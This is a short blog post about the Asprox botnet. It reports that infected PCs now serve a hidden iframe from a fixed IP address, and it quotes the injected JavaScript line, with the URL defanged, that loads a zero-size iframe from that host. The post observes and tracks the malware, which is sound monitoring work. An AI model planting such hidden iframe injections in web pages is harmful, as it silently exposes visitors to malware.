Silent noise - about spam, trojans and other nasty stuff

A few days ago I wrote that the javascript files on the Asprox botnet was now pointing to a static IP instead of infected PCs on the botnet. Or more correctly: The content of the webpage hosted by the infected PCs on the Asprox botnet is an iframe from 91.203.93.4, inserted via javascript like this:

document.write("<iframe src=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");

I have followed this the last days, only manually, I don't have the tools nor the knowledge to automate this.